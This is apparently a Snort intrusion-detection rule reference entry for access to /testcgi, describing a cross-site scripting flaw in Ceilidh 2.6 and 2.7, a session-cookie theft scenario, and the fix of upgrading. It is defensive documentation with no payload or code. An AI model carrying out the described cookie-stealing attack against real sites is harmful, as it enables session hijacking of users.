GEN:SID | 1:1645 |
Message | WEB-CGI testcgi access |
Summary | This event is generated when an attempt is made to access /testcgi on a web server. This may indicate an attempt to exploit a cross-site scripting vulnerability that affects Ceilidh.
|
Impact | Arbitrary code execution, possible session hijack.
|
Detailed Information | This event indicates that an attempt has been made to exploit a cross-site scripting vulnerability in Ceilidh, web-based discussion software released by Lilikoi Software, Inc. An attacker can craft a URL that passes malicious code to testcgi.exe. If a legitimate user activates the URL, malicious code may be executed on the client computer.
|
Affected Systems | All web servers that Ceilidh 2.6 or 2.7 are vulnerable. All clients that access Ceilidh 2.6 or 2.7 are vulnerable.
|
Attack Scenarios | An attacker may craft a script that obtains the user's session cookie, thereby allowing the attacker to pose as the user for the duration of the session.
|
Ease of Attack | Simple. A proof of concept exists.
|
Corrective Action | Upgrade to the latest version of the software.
|
Additional References | Bugtraq http://www.securityfocus.com/bid/7214
Nessus http://cgi.nessus.org/plugins/dump.php3?id=11610
|
Rule References | bugtraq: 7214
nessus: 11610
|